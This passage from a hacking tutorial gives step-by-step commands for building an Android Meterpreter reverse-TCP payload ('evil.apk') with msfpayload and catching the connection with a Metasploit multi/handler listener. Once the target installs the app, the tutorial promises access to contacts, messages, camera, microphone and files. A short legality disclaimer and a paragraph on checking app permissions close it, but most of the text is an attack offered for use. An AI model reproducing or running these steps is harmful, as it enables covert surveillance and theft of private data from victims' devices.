2) Active Internet Connection.
3) An Android device to test the hack. That's it!

What one can do with this hack: 

By the end of this tutorial, one can perform the below hacks after successfully installing the deploy application on target device.
  • Get contacts (and all theirs informations)
  • Take a picture from the camera
  • Stream sound from microphone (or other sources..)
  • Get all messages
  • Streaming video (for activity based client only)
  • Access file manager and many more...


The Main Procedure:

When you are all set, carefully follow the below steps one by one.(all the code you need to enter will be shown in red color)

step1: Open the terminal in Linux , type the below code and press enter.

:~# msfpayload android/meterpreter/reverse_tcp LHOST=youripaddress LPORT=anyport(8080 or 4444) R > evil.apk


If you don't know your ip address, simply open another terminal and type "ifconfig" without quotes. You can see your ip address beside wlan0 it would be something like 192.168.x.x (Note: you need to do this only when you are connected to Internet).

Step2: Now the deploy application evil.apk will be automatically generated. You can find it in home folder.

Step3: Now open another terminal and type the below code.

> msfconsole


It takes sometime for metasploit to download and load its contents. So be patient!

Step4: When metasploit successfully loaded type the below code.

> use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.45.4 (the same ip address you entered in step1).
> set lport 8080 (the same port you used in step1).
exploit


Now the console starts listening to 192.168.45.4 at port 8080.

Step5: Now all you need to do is, copy the evil.apk from home folder to the target device.

Step6: Install the evil.apk on the target device and when the device is connected to the internet open the app.

Step7: As soon as you open the app in the device, you can see the connected device in console terminal.


Step8: Now you have full access to the device from the terminal. Just type help and you will be given with all the available commands.


Congrats! you have successfully hacked an android device.

Note: Accessing other's device without their permission is completely illegal. This tutorial is for educational purpose only and never use it for any illegal purpose.

How to avoid these kind of apps:

From this tutorial you may have understood how easy it is to hack android devices. So to protect your self from being hacked you should check the app thoroughly before installing it. It is must to check app permissions before installing because the app cannot do anything without user's permission.